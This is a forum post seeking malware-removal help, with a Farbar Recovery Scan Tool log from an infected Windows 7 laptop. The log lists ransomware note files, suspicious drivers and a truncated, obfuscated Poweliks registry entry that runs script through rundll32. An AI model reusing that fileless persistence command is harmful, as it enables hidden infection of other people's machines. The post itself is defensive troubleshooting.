Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Unknown malware related to viruses (?)


  • This topic is locked This topic is locked
12 replies to this topic

#1 tantryl

tantryl

  • Members
  • 31 posts
  • OFFLINE
  •  
  • Local time:05:04 PM

Posted 10 September 2014 - 05:19 AM

The only obvious symptom was that the security settings in IE were modified in a way that prevented downloading most things.
 
JRT and ADWCleaner found little. MBAM and MBAR found a few things and removed/quarantined them but it's clear by HJT & Farbar scans that remnants remain. Removing things with HJT does nothing, they're still there on subsequent scans.
 
MSE found and removed a bunch of stuff starting 4 days ago and ending yesterday after I ran the above - Trojan:Win32/Qadars.A, Exploit:HTML/Pangimop.V, Behaviour:Win32/Crowti.A, Behaviour:Win32/Crowti.C, Behaviour:Win32/Vawtrak.A, Backdoor:Win32/Vawtrak.F, Trojan:Win32/Powessere.A, PWS:Win32/Zbot.gen!AP, Ransom:Win32/Crowti.A, Trojan:Win32/Qadars and Trojan:Win32/Ropest.G. Running MSE now reveals nothing, neither does aswmbr.
 
Win7 Sp1 needs to be installed along with a newer version of Reader and probably a couple of other things I haven't noticed but I figure taking care of this is the first priority.
 
I would appreciate any help.
 
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 07-09-2014
Ran by hesperia (administrator) on HESPERIA-PC on 10-09-2014 17:35:03
Running from C:\Users\hesperia\Downloads
Platform: Microsoft Windows 7 Home Premium  (X86) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal
 
The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/ 
Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/ 
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Microsoft Corporation) C:\Program Files\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(TeamViewer GmbH) C:\Program Files\TeamViewer\Version6\TeamViewer_Service.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\TecoService.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(TeamViewer GmbH) C:\Program Files\TeamViewer\Version6\TeamViewer.exe
(Advanced Micro Devices Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Conexant Systems, Inc.) C:\Program Files\CONEXANT\cAudioFilterAgent\cAudioFilterAgent.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TPwrMain.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe
(Microsoft Corporation) C:\Program Files\Microsoft IntelliPoint\ipoint.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Adobe Systems Incorporated) C:\Config.Msi\17e72.rbf
(CANON INC.) C:\Program Files\Canon\MyPrinter\BJMYPRT.EXE
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(ATI Technologies Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(TOSHIBA CORPORATION) C:\Program Files\TOSHIBA\ConfigFree\NDSTray.exe
(TOSHIBA CORPORATION) C:\Program Files\TOSHIBA\ConfigFree\CFSwMgr.exe
(TeamViewer GmbH) C:\Program Files\TeamViewer\Version6\TeamViewer_Desktop.exe
(TeamViewer GmbH) C:\Program Files\TeamViewer\Version6\tv_w32.exe
(Adobe Systems Incorporated) C:\Config.Msi\17e3f.rbf
(Microsoft Corporation) C:\Windows\System32\msiexec.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MpCmdRun.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\System32\wuauclt.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [] => [X]
HKLM\...\Run: [StartCCC] => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2010-03-16] (Advanced Micro Devices, Inc.)
HKLM\...\Run: [cAudioFilterAgent] => C:\Program Files\Conexant\cAudioFilterAgent\cAudioFilterAgent.exe [496184 2010-03-23] (Conexant Systems, Inc.)
HKLM\...\Run: [TPwrMain] => C:\Program Files\TOSHIBA\Power Saver\TPwrMain.EXE [480608 2009-11-06] (TOSHIBA Corporation)
HKLM\...\Run: [00TCrdMain] => C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe [742712 2010-03-04] (TOSHIBA Corporation)
HKLM\...\Run: [TWebCamera] => C:\Program Files\TOSHIBA\TOSHIBA Web Camera Application\TWebCamera.exe [2454840 2010-02-24] (TOSHIBA CORPORATION.)
HKLM\...\Run: [IntelliPoint] => c:\Program Files\Microsoft IntelliPoint\ipoint.exe [1797008 2010-07-21] (Microsoft Corporation)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2010-11-29] (Apple Inc.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [421160 2010-12-13] (Apple Inc.)
HKLM\...\Run: [CanonMyPrinter] => C:\Program Files\Canon\MyPrinter\BJMyPrt.exe [2508104 2009-11-02] (CANON INC.)
HKLM\...\Run: [CanonSolutionMenu] => C:\Program Files\Canon\SolutionMenu\CNSLMAIN.exe [767312 2009-09-04] (CANON INC.)
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [284440 2011-10-17] (Intel Corporation)
HKLM\...\Run: [ToshibaServiceStation] => C:\Program Files\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe [1295736 2011-02-11] (TOSHIBA Corporation)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [951576 2014-03-11] (Microsoft Corporation)
HKLM\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe [37296 2012-01-03] (Adobe Systems Incorporated)
HKU\S-1-5-21-931387415-1679961563-2565028958-1004\...\Run: [.tluafed** <*>] => C:\Users\hesperia\Application Data\{00006159-2247-321A-78CD-B6B14BD17071}.ex <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-931387415-1679961563-2565028958-1004\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com.au/
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/
SearchScopes: HKCU - {F4ED0519-C584-4DDA-BE93-FA0B93D040F6} URL = 
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll (CANON INC.)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
BHO: TOSHIBA Media Controller Plug-in -> {F3C88694-EFFA-4d78-B409-54B7B2535B14} -> C:\Program Files\TOSHIBA\TOSHIBA Media Controller Plug-in\TOSHIBAMediaControllerIE.dll (<TOSHIBA>)
BHO: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus32.dll (Adblock Plus)
Toolbar: HKLM - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll (CANON INC.)
Toolbar: HKCU - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll (CANON INC.)
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/update/1.6.0/jinstall-1_6_0_17-windows-i586.cab
DPF: {CAFEEFAC-0016-0000-0017-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_17-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_17-windows-i586.cab
DPF: {CF84DAC5-A4F5-419E-A0BA-C01FFD71112F} http://content.systemrequirementslab.com.s3.amazonaws.com/global/bin/srldetect_intel_4.4.24.0.cab
Handler: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll (Microsoft Corporation)
Handler: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll (Microsoft Corporation)
Winsock: Catalog5 09 C:\Program Files\Bonjour\mdnsNSP.dll [152864] (Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
 
FireFox:
========
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @canon.com/EPPEX -> C:\Program Files\Canon\Easy-PhotoPrint EX\NPEZFFPI.DLL (CANON INC.)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MIF5BA~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MIF5BA~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=14.0.8117.0416 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 9.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
 
Chrome: 
=======
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 AgereModemAudio; C:\Program Files\LSI SoftModem\agrsmsvc.exe [14336 2009-03-28] (LSI Corporation)
S3 cfWiMAXService; C:\Program Files\TOSHIBA\ConfigFree\CFIWmxSvcs.exe [185712 2010-01-29] (TOSHIBA CORPORATION)
S3 ConfigFree Service; C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe [46448 2009-03-11] (TOSHIBA CORPORATION)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [22216 2014-03-11] (Microsoft Corporation)
S3 MSSQL$MSSMLBIZ; c:\Program Files\Microsoft SQL Server\MSSQL.2\MSSQL\Binn\sqlservr.exe [29293408 2010-12-10] (Microsoft Corporation)
S4 MSSQLServerADHelper; c:\Program Files\Microsoft SQL Server\90\Shared\sqladhlp90.exe [44384 2010-12-10] (Microsoft Corporation)
S3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [279776 2014-03-11] (Microsoft Corporation)
R3 TMachInfo; C:\Program Files\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe [54136 2011-02-11] (TOSHIBA Corporation)
R2 TOSHIBA eco Utility Service; C:\Program Files\TOSHIBA\TECO\TecoService.exe [189808 2010-03-17] (TOSHIBA Corporation)
S3 TOSHIBA HDD SSD Alert Service; C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe [111960 2010-02-06] (TOSHIBA Corporation)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 amdkmdag; C:\windows\System32\DRIVERS\atipmdag.sys [5340160 2010-03-15] (ATI Technologies Inc.)
R3 CnxtHdmiAudService; C:\windows\System32\drivers\CHDMI32.sys [516152 2010-03-06] (Conexant Systems Inc.)
R0 MpFilter; C:\windows\System32\DRIVERS\MpFilter.sys [231960 2014-01-25] (Microsoft Corporation)
R3 PGEffect; C:\windows\System32\DRIVERS\pgeffect.sys [24064 2009-06-23] (TOSHIBA Corporation)
S1 ajvytjcn; \??\C:\windows\system32\drivers\ajvytjcn.sys [X]
S1 ezgvvduv; \??\C:\windows\system32\drivers\ezgvvduv.sys [X]
S1 hijfosmh; \??\C:\windows\system32\drivers\hijfosmh.sys [X]
S1 ivhuifer; \??\C:\windows\system32\drivers\ivhuifer.sys [X]
S1 kmsjshbz; \??\C:\windows\system32\drivers\kmsjshbz.sys [X]
S1 lnsgscfl; \??\C:\windows\system32\drivers\lnsgscfl.sys [X]
S1 pluzxczp; \??\C:\windows\system32\drivers\pluzxczp.sys [X]
S1 qozzqzgr; \??\C:\windows\system32\drivers\qozzqzgr.sys [X]
S3 Tosrfcom; No ImagePath
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-09-10 17:34 - 2014-09-10 17:35 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader 9.lnk
2014-09-10 17:34 - 2014-09-10 17:35 - 00001955 _____ () C:\Users\Public\Desktop\Adobe Reader 9.lnk
2014-09-10 17:34 - 2014-09-10 17:34 - 00000000 ____D () C:\Program Files\Adobe
2014-09-10 03:01 - 2014-09-10 03:01 - 00000000 ____D () C:\windows\system32\SPReview
2014-09-09 15:25 - 2014-09-09 15:26 - 00034865 _____ () C:\Users\hesperia\Downloads\Addition.txt
2014-09-09 15:24 - 2014-09-10 17:38 - 00012878 _____ () C:\Users\hesperia\Downloads\FRST.txt
2014-09-09 15:24 - 2014-09-10 17:35 - 00000000 ____D () C:\FRST
2014-09-09 15:23 - 2014-09-09 15:23 - 01097728 _____ (Farbar) C:\Users\hesperia\Downloads\FRST.exe
2014-09-09 15:12 - 2014-09-09 15:15 - 05185536 _____ (AVAST Software) C:\Users\hesperia\Downloads\aswmbr.exe
2014-09-09 14:47 - 2014-09-09 14:47 - 00001103 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 6.lnk
2014-09-09 14:47 - 2014-09-09 14:47 - 00001091 _____ () C:\Users\Public\Desktop\TeamViewer 6.lnk
2014-09-09 14:47 - 2014-09-09 14:47 - 00000000 ____D () C:\Program Files\TeamViewer
2014-09-09 14:44 - 2014-09-09 14:44 - 00000000 ____D () C:\Program Files\Adblock Plus for IE
2014-09-09 14:41 - 2014-09-09 15:10 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-09-09 14:41 - 2014-09-09 14:41 - 00113880 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\48230029.sys
2014-09-09 14:41 - 2014-09-09 14:41 - 00001031 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-09 14:41 - 2014-09-09 14:41 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-09 14:40 - 2014-09-09 14:56 - 00000000 ____D () C:\Users\hesperia\Desktop\mbar
2014-09-09 14:40 - 2014-09-09 14:40 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-09-09 14:40 - 2014-05-12 07:26 - 00051928 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mwac.sys
2014-09-09 14:40 - 2014-05-12 07:25 - 00074456 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbamchameleon.sys
2014-09-09 14:33 - 2014-09-09 15:11 - 00000000 ____D () C:\Users\hesperia\Downloads\backups
2014-09-09 14:30 - 2014-09-09 14:35 - 00000000 ____D () C:\AdwCleaner
2014-09-09 14:28 - 2014-09-09 14:28 - 00000000 ____D () C:\windows\ERUNT
2014-09-09 14:24 - 2014-09-09 14:24 - 00388608 _____ (Trend Micro Inc.) C:\Users\hesperia\Downloads\HijackThis.exe
2014-09-08 18:32 - 2014-09-08 18:33 - 00232208 _____ () C:\windows\Minidump\090814-36613-01.dmp
2014-09-07 18:51 - 2014-09-09 08:14 - 00000000 ____D () C:\Users\hesperia\AppData\Roaming\Awyhvya
2014-09-07 13:42 - 2014-09-07 18:11 - 00000000 ____D () C:\Users\hesperia\AppData\Roaming\Usleabo
2014-09-07 13:29 - 2014-09-07 13:29 - 00006144 __RSH () C:\Users\hesperia\AppData\Roaming\{00006159-2247-321A-78CD-B6B14BD17071}.exe
2014-09-07 09:40 - 2014-09-07 09:40 - 00008172 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.HTML
2014-09-07 09:40 - 2014-09-07 09:40 - 00004130 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.TXT
2014-09-07 09:40 - 2014-09-07 09:40 - 00000252 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.URL
2014-09-07 09:22 - 2014-09-07 09:22 - 00000000 ____D () C:\Users\hesperia\AppData\Roaming\sRaiGGih
2014-08-14 07:42 - 2014-08-07 09:35 - 00410112 _____ (Microsoft Corporation) C:\windows\system32\aepdu.dll
2014-08-14 07:42 - 2014-08-07 09:32 - 00303104 _____ (Microsoft Corporation) C:\windows\system32\aeinv.dll
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-09-10 17:38 - 2014-09-09 15:24 - 00012878 _____ () C:\Users\hesperia\Downloads\FRST.txt
2014-09-10 17:37 - 2010-11-03 08:45 - 01454983 _____ () C:\windows\WindowsUpdate.log
2014-09-10 17:35 - 2014-09-10 17:34 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader 9.lnk
2014-09-10 17:35 - 2014-09-10 17:34 - 00001955 _____ () C:\Users\Public\Desktop\Adobe Reader 9.lnk
2014-09-10 17:35 - 2014-09-09 15:24 - 00000000 ____D () C:\FRST
2014-09-10 17:34 - 2014-09-10 17:34 - 00000000 ____D () C:\Program Files\Adobe
2014-09-10 17:34 - 2011-04-29 10:16 - 00000000 ____D () C:\Program Files\Common Files\Adobe
2014-09-10 17:34 - 2010-07-07 10:08 - 00000000 ____D () C:\ProgramData\Adobe
2014-09-10 17:33 - 2010-12-31 22:20 - 00000000 ____D () C:\Users\hesperia\AppData\Local\Adobe
2014-09-10 17:32 - 2009-07-14 12:53 - 00000006 ____H () C:\windows\Tasks\SA.DAT
2014-09-10 17:31 - 2010-12-19 11:01 - 00683950 _____ () C:\windows\PFRO.log
2014-09-10 17:31 - 2009-07-14 12:39 - 00143247 _____ () C:\windows\setupact.log
2014-09-10 16:40 - 2013-04-27 13:08 - 00000830 _____ () C:\windows\Tasks\Adobe Flash Player Updater.job
2014-09-10 03:01 - 2014-09-10 03:01 - 00000000 ____D () C:\windows\system32\SPReview
2014-09-09 23:10 - 2011-02-23 10:13 - 00000000 ____D () C:\Users\hesperia\AppData\Local\CrashDumps
2014-09-09 15:26 - 2014-09-09 15:25 - 00034865 _____ () C:\Users\hesperia\Downloads\Addition.txt
2014-09-09 15:23 - 2014-09-09 15:23 - 01097728 _____ (Farbar) C:\Users\hesperia\Downloads\FRST.exe
2014-09-09 15:18 - 2009-07-14 12:34 - 00016080 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-09-09 15:18 - 2009-07-14 12:34 - 00016080 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-09-09 15:15 - 2014-09-09 15:12 - 05185536 _____ (AVAST Software) C:\Users\hesperia\Downloads\aswmbr.exe
2014-09-09 15:11 - 2014-09-09 14:33 - 00000000 ____D () C:\Users\hesperia\Downloads\backups
2014-09-09 15:10 - 2014-09-09 14:41 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-09-09 14:59 - 2011-04-29 10:03 - 00110296 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbamswissarmy.sys
2014-09-09 14:56 - 2014-09-09 14:40 - 00000000 ____D () C:\Users\hesperia\Desktop\mbar
2014-09-09 14:47 - 2014-09-09 14:47 - 00001103 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 6.lnk
2014-09-09 14:47 - 2014-09-09 14:47 - 00001091 _____ () C:\Users\Public\Desktop\TeamViewer 6.lnk
2014-09-09 14:47 - 2014-09-09 14:47 - 00000000 ____D () C:\Program Files\TeamViewer
2014-09-09 14:44 - 2014-09-09 14:44 - 00000000 ____D () C:\Program Files\Adblock Plus for IE
2014-09-09 14:41 - 2014-09-09 14:41 - 00113880 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\48230029.sys
2014-09-09 14:41 - 2014-09-09 14:41 - 00001031 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-09 14:41 - 2014-09-09 14:41 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-09 14:40 - 2014-09-09 14:40 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-09-09 14:40 - 2011-04-29 10:03 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-09-09 14:35 - 2014-09-09 14:30 - 00000000 ____D () C:\AdwCleaner
2014-09-09 14:28 - 2014-09-09 14:28 - 00000000 ____D () C:\windows\ERUNT
2014-09-09 14:24 - 2014-09-09 14:24 - 00388608 _____ (Trend Micro Inc.) C:\Users\hesperia\Downloads\HijackThis.exe
2014-09-09 08:14 - 2014-09-07 18:51 - 00000000 ____D () C:\Users\hesperia\AppData\Roaming\Awyhvya
2014-09-08 18:33 - 2014-09-08 18:32 - 00232208 _____ () C:\windows\Minidump\090814-36613-01.dmp
2014-09-08 18:32 - 2011-09-21 14:51 - 405289750 _____ () C:\windows\MEMORY.DMP
2014-09-08 18:32 - 2011-04-29 09:59 - 00000000 ____D () C:\windows\Minidump
2014-09-07 18:11 - 2014-09-07 13:42 - 00000000 ____D () C:\Users\hesperia\AppData\Roaming\Usleabo
2014-09-07 13:29 - 2014-09-07 13:29 - 00006144 __RSH () C:\Users\hesperia\AppData\Roaming\{00006159-2247-321A-78CD-B6B14BD17071}.exe
2014-09-07 10:07 - 2009-07-14 10:37 - 00000000 ____D () C:\windows\system32\NDF
2014-09-07 09:40 - 2014-09-07 09:40 - 00008172 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.HTML
2014-09-07 09:40 - 2014-09-07 09:40 - 00004130 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.TXT
2014-09-07 09:40 - 2014-09-07 09:40 - 00000252 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.URL
2014-09-07 09:40 - 2010-12-21 13:59 - 00000000 ____D () C:\Users\hesperia\AppData\Local\Apple Computer
2014-09-07 09:40 - 2010-11-03 09:33 - 00000000 ____D () C:\ProgramData\Skype
2014-09-07 09:40 - 2010-11-03 09:02 - 00000000 ____D () C:\ProgramData\Norton
2014-09-07 09:22 - 2014-09-07 09:22 - 00000000 ____D () C:\Users\hesperia\AppData\Roaming\sRaiGGih
2014-08-14 08:09 - 2010-11-03 09:24 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-08-14 08:07 - 2014-07-10 08:52 - 00000000 ___SD () C:\windows\system32\CompatTel
 
Some content of TEMP:
====================
C:\Users\hesperia\AppData\Local\Temp\Quarantine.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\windows\explorer.exe => File is digitally signed
C:\windows\system32\winlogon.exe => File is digitally signed
C:\windows\system32\wininit.exe => File is digitally signed
C:\windows\system32\svchost.exe => File is digitally signed
C:\windows\system32\services.exe => File is digitally signed
C:\windows\system32\User32.dll => File is digitally signed
C:\windows\system32\userinit.exe => File is digitally signed
C:\windows\system32\rpcss.dll => File is digitally signed
C:\windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-09-06 10:25
 
==================== End Of Log ============================
 
 
 
Additional scan result of Farbar Recovery Scan Tool (x86) Version: 07-09-2014
Ran by hesperia at 2014-09-10 17:38:48
Running from C:\Users\hesperia\Downloads
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Microsoft Security Essentials (Disabled - Up to date) {641105E6-77ED-3F35-A304-765193BCB75F}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Microsoft Security Essentials (Disabled - Up to date) {DF70E402-51D7-30BB-99B4-4D23E83BFDE2}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
Adblock Plus for IE (32-bit) (HKLM\...\{DF0E7912-4A45-4B24-B472-E521C4D2C663}) (Version: 99.9 - Eyeo GmbH)
Adobe Flash Player 11 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 11.7.700.169 - Adobe Systems Incorporated)
Adobe Reader 9.5.5 (HKLM\...\{AC76BA86-7AD7-1033-7B44-A95000000001}) (Version: 9.5.5 - Adobe Systems Incorporated)
Apple Application Support (HKLM\...\{EE6097DD-05F4-4178-9719-D3170BF098E8}) (Version: 1.4.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{308B6AEA-DE50-4666-996D-0FA461719D6B}) (Version: 3.3.0.69 - Apple Inc.)
Apple Software Update (HKLM\...\{C41300B9-185D-475E-BFEC-39EF732F19B1}) (Version: 2.1.2.120 - Apple Inc.)
Atheros Communications Inc.® AR81Family Gigabit/Fast Ethernet Driver (HKLM\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 1.0.0.26 - Atheros Communications Inc.)
ATI Catalyst Install Manager (HKLM\...\{607CAF58-360F-8AB2-0E15-8B71B86E2390}) (Version: 3.0.765.0 - ATI Technologies, Inc.)
Bluetooth Stack for Windows by Toshiba (HKLM\...\{CEBB6BFB-D708-4F99-A633-BC2600E01EF6}) (Version: v7.10.10(T) - TOSHIBA CORPORATION)
Bonjour (HKLM\...\{2A981294-F14C-4F0F-9627-D793270922F8}) (Version: 2.0.4.0 - Apple Inc.)
Broadcom 802.11 Network Adapter (HKLM\...\Broadcom 802.11 Network Adapter) (Version: 5.60.48.35 - Broadcom Corporation)
BurnInTest v5.3 Pro (HKLM\...\BurnInTest_is1) (Version: 5.3 - Passmark Software)
Business Contact Manager for Outlook 2007 SP2 (HKLM\...\Business Contact Manager) (Version: 3.0.8619.1 - Microsoft Corporation)
Business Contact Manager for Outlook 2007 SP2 (Version: 3.0.8619.1 - Microsoft Corporation) Hidden
Canon Easy-WebPrint EX (HKLM\...\Easy-WebPrint EX) (Version:  - )
Canon MP Navigator EX 3.1 (HKLM\...\MP Navigator EX 3.1) (Version:  - )
Canon MX870 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MX870_series) (Version:  - )
